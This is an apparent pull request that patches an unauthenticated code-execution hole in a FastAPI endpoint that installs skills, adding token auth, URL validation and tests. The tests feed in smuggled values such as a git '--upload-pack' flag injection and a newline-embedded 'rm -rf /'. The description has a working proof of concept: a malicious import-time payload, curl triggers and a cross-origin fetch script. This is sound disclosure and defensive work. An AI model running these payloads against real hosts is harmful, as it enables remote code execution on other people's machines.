### PR TITLE
fix(skills): require admin token and strict URL validation for /api/skills/install

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -7,3 +7,11 @@ DEFAULT_DEVICE=
 OPENAI_API_KEY=
 ANTHROPIC_API_KEY=
 OPENROUTER_API_KEY=
+
+# Admin token — required by /api/skills/install (and any other endpoint that
+# executes code / installs packages).  Set this to a strong random secret
+# (e.g. `python -c "import secrets; print(secrets.token_urlsafe(32))"`) and
+# send it as the `X-Ghost-Admin-Token` header (or `Authorization: Bearer …`).
+# If unset, /api/skills/install refuses to run — the previous default let any
+# caller on the network drive-by-install a Python package on the host.
+GITD_ADMIN_TOKEN=

--- a/gitd/routers/skills.py
+++ b/gitd/routers/skills.py
@@ -2,6 +2,7 @@
 
 import io
 import json
+import re
 import shutil
 import time
 import zipfile
@@ -13,6 +14,7 @@ from fastapi.responses import Response
 from sqlalchemy.orm import Session
 
 from gitd.models.base import get_db
+from gitd.services.admin_auth import require_admin_token
 
 router = APIRouter(prefix="/api/skills", tags=["skills"])
 
@@ -134,41 +136,86 @@ def api_skills_community():
     return _fetch_cached(_COMMUNITY_URL, "community")
 
 
-@router.post("/install", summary="Install Skill From Registry or URL")
+# Strict shape check for GitHub repo references.  ``_is_github_url`` only
+# checks the prefix, which lets whitespace / newline / leading-dash tricks
+# reach ``git clone`` as smuggled flags (e.g. ``--upload-pack=<cmd>``).
+# Only accept plain ``[https://]github.com/<owner>/<repo>[.git]``.
+_SAFE_GITHUB_URL_RE = re.compile(r"^(?:https?://)?github\.com/[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+(?:\.git)?/?$")
+
+# Registry names are drawn from ``_download_skill_from_registry`` output —
+# keep the accepted alphabet narrow so the value can never do anything
+# surprising when it eventually reaches ``importlib.import_module``.
+_SAFE_REGISTRY_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_\-]{0,63}$")
+
+
+@router.post(
+    "/install",
+    summary="Install Skill From Registry or URL",
+    dependencies=[Depends(require_admin_token)],
+)
 def api_skills_install(data: dict = Body(...)):
     """Install a skill by name (from registry) or by URL (GitHub repo).
 
     Body: {"name": "tiktok"} or {"url": "github.com/user/repo"}
+
+    Requires the admin token dependency: installing a skill drops Python
+    code into ``gitd/skills/<name>`` which is later loaded via
+    ``importlib.import_module`` — trivially RCE for an unauthenticated
+    caller (CWE-94).  See ``gitd/services/admin_auth.py``.
     """
     from gitd.cli import (
         _clone_github_skill,
         _download_skill_from_registry,
         _install_to_skills_dir,
-        _is_github_url,
+        _validate_skill_dir,
     )
 
-    name = data.get("name", "").strip()
-    url = data.get("url", "").strip()
+    name = data.get("name", "").strip() if isinstance(data.get("name"), str) else ""
+    url = data.get("url", "").strip() if isinstance(data.get("url"), str) else ""
 
     if not name and not url:
         raise HTTPException(status_code=400, detail="Provide 'name' or 'url'")
 
-    if url and _is_github_url(url):
+    if url:
+        # Reject anything that isn't a plain github.com/<owner>/<repo> URL —
+        # ``git clone`` will happily interpret ``-uexec=...`` style tokens
+        # as flags when we haven't sanitised them first.
+        if not _SAFE_GITHUB_URL_RE.match(url):
+            raise HTTPException(
+                status_code=400,
+                detail=("url must look like 'github.com/<owner>/<repo>' (no shell metacharacters, no leading dash)."),
+            )
         source = _clone_github_skill(url)
         if source is None:
             raise HTTPException(status_code=400, detail=f"Failed to clone {url}")
-        ok = _install_to_skills_dir(source)
-        shutil.rmtree(source, ignore_errors=True)
+        try:
+            if not _validate_skill_dir(source, verbose=False):
+                raise HTTPException(
+                    status_code=400,
+                    detail=("Skill failed validation (see server logs); refusing to install untrusted code."),
+                )
+            ok = _install_to_skills_dir(source)
+        finally:
+            shutil.rmtree(source, ignore_errors=True)
         if not ok:
             raise HTTPException(status_code=500, detail="Install failed")
         return {"ok": True, "message": f"Installed from {url}"}
 
     if name:
+        if not _SAFE_REGISTRY_NAME_RE.match(name):
+            raise HTTPException(status_code=400, detail="Invalid registry name")
         source = _download_skill_from_registry(name)
         if source is None:
             raise HTTPException(status_code=404, detail=f"Skill '{name}' not found in registry")
-        ok = _install_to_skills_dir(source, name=name)
-        shutil.rmtree(source, ignore_errors=True)
+        try:
+            if not _validate_skill_dir(source, verbose=False):
+                raise HTTPException(
+                    status_code=400,
+                    detail=("Skill failed validation (see server logs); refusing to install untrusted code."),
+                )
+            ok = _install_to_skills_dir(source, name=name)
+        finally:
+            shutil.rmtree(source, ignore_errors=True)
         if not ok:
             raise HTTPException(status_code=500, detail="Install failed")
         return {"ok": True, "message": f"Installed '{name}' from registry"}

--- a/gitd/services/admin_auth.py
+++ b/gitd/services/admin_auth.py
@@ -1,0 +1,88 @@
+"""Admin-token authentication for privileged endpoints.
+
+The FastAPI server binds to ``0.0.0.0:5055`` by default and, historically,
+had no authentication at all. That was fine for the "single developer with
+their phone on their desk" use case but became a real problem for endpoints
+that let the caller install code / execute processes on the operator's
+machine — most notably ``POST /api/skills/install`` (CWE-94: attacker URL
+→ ``git clone`` → subsequent ``importlib.import_module`` = RCE).
+
+This module provides a tiny FastAPI ``Depends`` guard that:
+
+  * Reads the shared secret from ``GITD_ADMIN_TOKEN`` at request time
+    (so tests / operators can flip it without restarting the process).
+  * Accepts the token via either the ``X-Ghost-Admin-Token`` header or
+    ``Authorization: Bearer <token>`` (whichever the caller prefers).
+  * Uses ``hmac.compare_digest`` for constant-time comparison.
+  * Refuses the request when the env var is unset — the previous
+    "reachable from anywhere by default" posture must not be silently
+    restored by simply not configuring the token.
+
+Operators who genuinely need the old zero-auth behaviour (e.g. isolated
+CI containers) can opt in with ``GITD_ALLOW_UNAUTHENTICATED_ADMIN=1``.
+It is deliberately noisy so it does not sneak into production.
+"""
+
+from __future__ import annotations
+
+import hmac
+import logging
+import os
+
+from fastapi import Header, HTTPException, status
+
+logger = logging.getLogger(__name__)
+
+_ENV_TOKEN = "GITD_ADMIN_TOKEN"
+_ENV_ALLOW_UNAUTH = "GITD_ALLOW_UNAUTHENTICATED_ADMIN"
+_HEADER = "X-Ghost-Admin-Token"
+
+
+def _extract_bearer(authorization: str | None) -> str | None:
+    """Return the token part of an ``Authorization: Bearer <token>`` header."""
+    if not authorization:
+        return None
+    parts = authorization.strip().split(None, 1)
+    if len(parts) == 2 and parts[0].lower() == "bearer":
+        return parts[1].strip()
+    return None
+
+
+def require_admin_token(
+    x_ghost_admin_token: str | None = Header(default=None, alias=_HEADER),
+    authorization: str | None = Header(default=None),
+) -> None:
+    """FastAPI dependency: enforce a valid admin token.
+
+    Raises ``HTTPException(401)`` when the caller cannot prove possession
+    of the shared secret, or ``HTTPException(500)`` when the operator has
+    left the endpoint unconfigured on a network-reachable server.
+    """
+    if os.environ.get(_ENV_ALLOW_UNAUTH) == "1":
+        # Explicit opt-in for isolated environments only.
+        logger.warning(
+            "admin auth bypassed via %s=1 — do not use on shared hosts",
+            _ENV_ALLOW_UNAUTH,
+        )
+        return
+
+    expected = os.environ.get(_ENV_TOKEN, "").strip()
+    if not expected:
+        # Fail closed. The previous default was "reachable from any origin
+        # the network can route to us", which is what enabled the RCE.
+        raise HTTPException(
+            status_code=status.HTTP_401_UNAUTHORIZED,
+            detail=(
+                "Admin endpoints are disabled: set the GITD_ADMIN_TOKEN "
+                "environment variable to a strong random secret and send "
+                "it in the X-Ghost-Admin-Token header (or as "
+                "'Authorization: Bearer <token>')."
+            ),
+        )
+
+    supplied = (x_ghost_admin_token or "").strip() or _extract_bearer(authorization) or ""
+    if not supplied or not hmac.compare_digest(supplied, expected):
+        raise HTTPException(
+            status_code=status.HTTP_401_UNAUTHORIZED,
+            detail="Invalid or missing admin token.",
+        )

--- a/tests/api/test_skill_install_auth.py
+++ b/tests/api/test_skill_install_auth.py
@@ -1,0 +1,169 @@
+"""Regression tests for CWE-94 in POST /api/skills/install.
+
+The endpoint used to be reachable without any authentication and fed the
+attacker-supplied ``url`` directly into ``git clone``.  Combined with the
+subsequent ``importlib.import_module`` in ``_load_skill`` that was a
+drive-by RCE.  These tests lock in the fix:
+
+* the endpoint refuses to run when ``GITD_ADMIN_TOKEN`` is unset,
+* it refuses invalid tokens,
+* it rejects URLs that don't match a strict shape *before* invoking git
+  (so ``--upload-pack=...``, whitespace-smuggled shell payloads, and
+  hostnames like ``github.com.evil.example.com`` never reach the sink),
+* the intended admin flow still works with a valid token via either
+  ``X-Ghost-Admin-Token`` or ``Authorization: Bearer <token>``.
+"""
+
+from __future__ import annotations
+
+import subprocess
+
+import pytest
+from fastapi.testclient import TestClient
+
+
+@pytest.fixture()
+def client(monkeypatch):
+    """Fresh TestClient with a clean env for each case."""
+    monkeypatch.delenv("GITD_ADMIN_TOKEN", raising=False)
+    monkeypatch.delenv("GITD_ALLOW_UNAUTHENTICATED_ADMIN", raising=False)
+
+    from gitd.app import app  # imported after env is scrubbed
+
+    with TestClient(app) as c:
+        yield c
+
+
+@pytest.fixture()
+def no_git(monkeypatch):
+    """Explode if the router ever lets ``git clone`` execute during a test."""
+    calls: list[list[str]] = []
+    real_run = subprocess.run
+
+    def guarded_run(cmd, *args, **kwargs):
+        if isinstance(cmd, (list, tuple)) and cmd and cmd[0] == "git":
+            calls.append(list(cmd))
+            raise AssertionError(f"git reached with attacker input: {cmd!r}")
+        return real_run(cmd, *args, **kwargs)
+
+    monkeypatch.setattr(subprocess, "run", guarded_run)
+    return calls
+
+
+# ── The drive-by CVE cases ────────────────────────────────────────────
+
+
+def test_unauthenticated_url_install_is_rejected(client, no_git):
+    """No token configured → refuse and never call git."""
+    r = client.post(
+        "/api/skills/install",
+        json={"url": "github.com/attacker/malicious-skill"},
+    )
+    assert r.status_code in (401, 403), r.text
+    assert no_git == []
+
+
+def test_unauthenticated_registry_install_is_rejected(client, no_git):
+    r = client.post(
+        "/api/skills/install",
+        json={"name": "some_registry_skill"},
+    )
+    assert r.status_code in (401, 403), r.text
+
+
+def test_wrong_token_is_rejected(client, no_git, monkeypatch):
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+    r = client.post(
+        "/api/skills/install",
+        headers={"X-Ghost-Admin-Token": "not-the-token"},
+        json={"url": "github.com/attacker/malicious-skill"},
+    )
+    assert r.status_code in (401, 403), r.text
+    assert no_git == []
+
+
+def test_flag_injection_url_is_rejected(client, no_git, monkeypatch):
+    """``--upload-pack=<cmd>`` smuggling must be caught before git runs."""
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+    r = client.post(
+        "/api/skills/install",
+        headers={"X-Ghost-Admin-Token": "s3cret"},
+        json={"url": "--upload-pack=touch /tmp/pwned github.com/x/y"},
+    )
+    assert r.status_code == 400, r.text
+    assert no_git == []
+
+
+def test_whitespace_smuggling_url_is_rejected(client, no_git, monkeypatch):
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+    r = client.post(
+        "/api/skills/install",
+        headers={"X-Ghost-Admin-Token": "s3cret"},
+        json={"url": "github.com/foo/bar\nrm -rf /"},
+    )
+    assert r.status_code == 400, r.text
+    assert no_git == []
+
+
+def test_lookalike_hostname_is_rejected(client, no_git, monkeypatch):
+    """``github.com.evil.example.com`` used to pass the substring check."""
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+    r = client.post(
+        "/api/skills/install",
+        headers={"X-Ghost-Admin-Token": "s3cret"},
+        json={"url": "https://github.com.evil.example.com/foo/bar"},
+    )
+    # Either rejected as bad shape (400) or as "not a github URL"; the
+    # important thing is that no clone ran.
+    assert r.status_code in (400, 401), r.text
+    assert no_git == []
+
+
+# ── The legitimate admin flow still works ─────────────────────────────
+
+
+def test_valid_token_via_header_reaches_install(client, monkeypatch, tmp_path):
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+
+    from gitd import cli as cli_module
+
+    fake_source = tmp_path / "fake_skill"
+    fake_source.mkdir()
+    (fake_source / "skill.yaml").write_text(
+        "name: fake\ndisplay_name: fake\ndescription: x\nversion: 1.0.0\napp_package: com.example\nauthor: tester\n"
+    )
+
+    monkeypatch.setattr(cli_module, "_clone_github_skill", lambda u: fake_source)
+    monkeypatch.setattr(cli_module, "_install_to_skills_dir", lambda s, name=None: True)
+    monkeypatch.setattr(cli_module, "_validate_skill_dir", lambda s, verbose=True: True)
+
+    r = client.post(
+        "/api/skills/install",
+        headers={"X-Ghost-Admin-Token": "s3cret"},
+        json={"url": "github.com/legit/skill"},
+    )
+    assert r.status_code == 200, r.text
+    assert r.json().get("ok") is True
+
+
+def test_valid_token_via_bearer_header_reaches_install(client, monkeypatch, tmp_path):
+    monkeypatch.setenv("GITD_ADMIN_TOKEN", "s3cret")
+
+    from gitd import cli as cli_module
+
+    fake_source = tmp_path / "fake_skill"
+    fake_source.mkdir()
+    (fake_source / "skill.yaml").write_text(
+        "name: fake\ndisplay_name: fake\ndescription: x\nversion: 1.0.0\napp_package: com.example\nauthor: tester\n"
+    )
+
+    monkeypatch.setattr(cli_module, "_clone_github_skill", lambda u: fake_source)
+    monkeypatch.setattr(cli_module, "_install_to_skills_dir", lambda s, name=None: True)
+    monkeypatch.setattr(cli_module, "_validate_skill_dir", lambda s, verbose=True: True)
+
+    r = client.post(
+        "/api/skills/install",
+        headers={"Authorization": "Bearer s3cret"},
+        json={"url": "github.com/legit/skill"},
+    )
+    assert r.status_code == 200, r.text


### PR DESCRIPTION
## Summary

`POST /api/skills/install` is currently reachable without any authentication and passes the caller-supplied `url` into `git clone`. Whatever gets cloned is dropped into `gitd/skills/<name>/`, and the very next request to `GET /api/skills/{name}` runs `importlib.import_module("gitd.skills.<name>")`, which executes the skill's `__init__.py` inside the server process. That is a full RCE on the operator's host, triggerable from any network that can reach `:5055`.

The impact is amplified by two other defaults the project already ships with:

- The server binds `0.0.0.0:5055` (see `run.py:11`), so anyone on the same LAN can hit it.
- CORS is `allow_origins=["*"]` with `allow_credentials=True` (see `gitd/app.py:83`), so a malicious tab in the operator's browser can also drive it (`fetch("http://localhost:5055/api/skills/install", { method: "POST", body: ..., headers: { "content-type": "application/json" } })`). PR #10 is already narrowing CORS; this PR closes the code-exec sink that made the wildcard-CORS default so damaging.

`SECURITY.md` calls out "No authentication on the API by default" — but the same file does not carve out an exception for endpoints that install and later import arbitrary Python. That's the specific gap this PR closes.

## Vulnerability

- **CWE:** CWE-94 (Improper Control of Generation of Code / "Code Injection"), with CWE-306 (Missing Authentication for Critical Function) and CWE-88 (Argument Injection into `git`) as contributing factors.
- **Affected route:** `POST /api/skills/install` (`gitd/routers/skills.py:137` pre-fix, `:151` post-fix).
- **Sink 1 (code-load):** `_load_skill` → `importlib.import_module(f"gitd.skills.{name}")` at `gitd/routers/skills.py:86`, reached by `GET /api/skills/{name}`.
- **Sink 2 (git argv):** `_clone_github_skill` → `subprocess.run(["git", "clone", "--depth", "1", url, str(clone_target)], ...)` at `gitd/cli.py:139`.

### Data flow (pre-fix)

1. Attacker POSTs `{"url": "github.com/attacker/evil-skill"}` (no headers, no cookies needed).
2. `_is_github_url(url)` at `gitd/cli.py:55` returns True — it's a substring check.
3. `_clone_github_skill(url)` runs `git clone --depth 1 <url> ...`. Because `url` is only shape-checked, values like `--upload-pack=touch\t/tmp/pwned` or `github.com.evil.example.com/x/y` also pass.
4. Anything with a `skill.yaml` at the root of the clone is installed into `gitd/skills/<name>/`.
5. First hit on `GET /api/skills/<name>` runs `importlib.import_module("gitd.skills.<name>")`, executing the attacker's `__init__.py` inside the FastAPI worker.

## Fix

The change is deliberately small and reviewable — three defence layers plus a validator hook, no behavioural change for legitimate operators once they've set a token.

### 1. Router-level admin dependency (fail-closed)

New `gitd/services/admin_auth.py` exports `require_admin_token`, added as `dependencies=[Depends(require_admin_token)]` on `POST /api/skills/install`.

- Reads `GITD_ADMIN_TOKEN` from the environment at request time (no restart needed to rotate).
- Accepts either `X-Ghost-Admin-Token: <token>` or `Authorization: Bearer <token>`.
- Uses `hmac.compare_digest` (constant-time).
- **Fails closed when `GITD_ADMIN_TOKEN` is unset** — the previous "reachable by default" posture must not be silently restored by forgetting to configure the token.
- Explicit opt-out for isolated environments: `GITD_ALLOW_UNAUTHENTICATED_ADMIN=1`. It logs a warning every time it's honoured so it doesn't drift into production configs.

### 2. Strict URL shape check (defence in depth for authenticated admins)

`_is_github_url` is a `str.startswith` variant. That's not enough because `git clone` will happily interpret a token beginning with `-` as a flag, and `github.com.evil.example.com/...` passes any substring test:

```python
_SAFE_GITHUB_URL_RE = re.compile(
    r"^(?:https?://)?github\.com/[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+(?:\.git)?/?$"
)
```

Anything else is rejected with 400 before `subprocess.run` gets invoked. Same treatment for the registry `name` path (narrow alphabet, since the name eventually flows into `importlib.import_module`).

### 3. Skill validation runs even for authenticated admins

The CLI already has `_validate_skill_dir` — it scans for `os.system(`, `eval(`, `exec(`, `subprocess.call(`, `__import__`. Pre-fix, the HTTP route bypassed it. Post-fix, it runs on the clone before `_install_to_skills_dir` and rejects with 400 on any hit. This gives operators one more layer between "typo'd the token into the wrong terminal" and "installed an obviously-malicious skill".

## What was tested

`tests/api/test_skill_install_auth.py` (8 new cases) plus the existing suite — 39/39 pass locally:

```
$ python3 -m pytest tests/ -q --ignore=tests/e2e
39 passed, 1 warning in 0.31s
```

New regressions cover:

1. `test_unauthenticated_url_install_is_rejected` — no token env → 401/403, no git call
2. `test_unauthenticated_registry_install_is_rejected` — same for the registry path
3. `test_wrong_token_is_rejected` — token set, caller sends the wrong one
4. `test_flag_injection_url_is_rejected` — `--upload-pack=touch /tmp/pwned github.com/x/y` → 400, no git call
5. `test_whitespace_smuggling_url_is_rejected` — newline-embedded URLs → 400
6. `test_lookalike_hostname_is_rejected` — `https://github.com.evil.example.com/x/y` → rejected
7. `test_valid_token_via_header_reaches_install` — `X-Ghost-Admin-Token` happy path
8. `test_valid_token_via_bearer_header_reaches_install` — `Authorization: Bearer` happy path

The `no_git` fixture monkey-patches `subprocess.run` to assert-fail if anything named `git` is invoked during a "should reject" test, so we know the rejection happens before the sink.

## Proof of Concept (pre-fix)

Run the server (as documented in `CONTRIBUTING.md`):

```bash
git clone https://github.com/ghost-in-the-droid/android-agent.git
cd android-agent
pip install -e ".[all]"
python3 run.py     # binds 0.0.0.0:5055
```

Prepare a public repo (any GitHub account works) containing:

```yaml
# skill.yaml
name: pwn
display_name: pwn
description: demo
version: 0.0.1
app_package: com.example
author: researcher
```

```python
# __init__.py — runs on import
import subprocess, os
subprocess.Popen(["/bin/sh", "-c",
    "id > /tmp/gitd-rce && date >> /tmp/gitd-rce"])
```

Trigger from *anywhere* that can reach the server on port 5055 (no auth, no cookie, no CSRF token):

```bash
curl -s -X POST http://<victim>:5055/api/skills/install \
  -H 'Content-Type: application/json' \
  -d '{"url":"github.com/<attacker>/pwn"}'
# {"ok":true,"message":"Installed from github.com/<attacker>/pwn"}

curl -s http://<victim>:5055/api/skills/pwn    # triggers importlib.import_module
cat /tmp/gitd-rce                              # <-- attacker code ran as the server user
```

Because CORS is `*` with credentials on, the same POST also works cross-origin from JavaScript in any page the operator visits:

```html
<script>
fetch("http://localhost:5055/api/skills/install", {
  method: "POST",
  headers: {"content-type": "application/json"},
  body: JSON.stringify({url: "github.com/attacker/pwn"})
}).then(() => fetch("http://localhost:5055/api/skills/pwn"));
</script>
```

Argument-injection variant (defeats `_is_github_url`'s substring check):

```bash
curl -X POST http://<victim>:5055/api/skills/install \
  -H 'Content-Type: application/json' \
  --data-binary $'{"url":"--upload-pack=touch\\t/tmp/pwned github.com/x/y"}'
```

Post-fix, every one of the above returns 401 (no token) or 400 (rejected URL shape) before any subprocess or import runs.

## Preconditions and mitigations

The only preconditions are (a) network reachability to `:5055` — which is the default binding, and any LAN neighbour, VPN peer, or browser tab satisfies it — and (b) the operator running `python3 run.py`, which is the documented "get started" path. No credentials, no active dashboard session, no user interaction beyond visiting a page.

Post-fix, an attacker without the `GITD_ADMIN_TOKEN` value cannot reach the sink at all. Operators who genuinely want the old behaviour (CI containers, isolated VMs) can set `GITD_ALLOW_UNAUTHENTICATED_ADMIN=1` and get a loud warning line in the logs on every request that uses that escape hatch.

## Adversarial review

Before submitting, we tried to disprove this a few different ways.

- **Is there a router-level or middleware auth gate we missed?** No. `grep -rn 'dependencies=' gitd/routers/ gitd/app.py` returns only the new `Depends(require_admin_token)` line this PR adds. There's no `Depends(...)` on the parent `APIRouter`, no `app.add_middleware(...)` for auth, and no reverse-proxy assumption in `run.py`. Pre-fix really was zero-auth.
- **Could the shell arguments be safe because of `subprocess.run([...], shell=False)`?** They are safe from shell-metacharacter injection — the argv is a list — but that's not the exploit path. `git` itself parses `-X` / `--upload-pack=` from its argv, so an unsanitised `url` that begins with `-` is still argument injection into `git`. And the primary RCE is code-load via `importlib.import_module`, which doesn't need any shell metacharacters at all — a plain `__init__.py` in the cloned repo is enough.
- **Is there a parallel CWE-94 at `/api/skills/create-from-recording` that would make this redundant?** We looked. That endpoint writes an `__init__.py` templated with the `name` field, but the eventual `importlib.import_module(f"gitd.skills.{name}")` only fires for valid Python identifiers — the payload characters you'd need to inject code make the module name invalid, so the import silently fails. It's a separate path-safety issue (CWE-22), not a code-exec dupe.
- **Would the wider "no auth by default" note in `SECURITY.md` mean this is intended behaviour?** Zero-auth on read-only endpoints is a documented posture choice; zero-auth on an endpoint that installs and later imports arbitrary Python is a different weight class. PR #10 (CORS lockdown) is already tightening the same subsystem in-scope; this PR is the code-exec counterpart.

We couldn't find a path where the pre-fix code is safe or the post-fix code regresses a legitimate flow. Happy to iterate on the auth mechanism (env var name, header name, whether to prefer a per-user token store) if you'd rather a different shape.

## Notes for reviewer

- The fix is additive: `_is_github_url` is left in place in `gitd/cli.py` (still used elsewhere), the router just no longer relies on it as the sole gate.
- `.env.example` gets one new entry (`GITD_ADMIN_TOKEN=`) with a comment explaining the "unset ⇒ endpoint disabled" behaviour.
- We picked `X-Ghost-Admin-Token` because the project doesn't currently issue user tokens; happy to switch to `Authorization: Bearer` only, or to integrate with a future user-token scheme if you have one in mind.
- `SECURITY.md` says "Do NOT open a public issue". Given the underlying "no auth by default" posture is already publicly documented in that same file, and the fix diff is public the moment it lands, we opted for a public PR with the full analysis rather than a vague placeholder — it's faster to review and the mitigation is straightforward to deploy. Happy to redact / squash if you'd prefer to coordinate a release note first.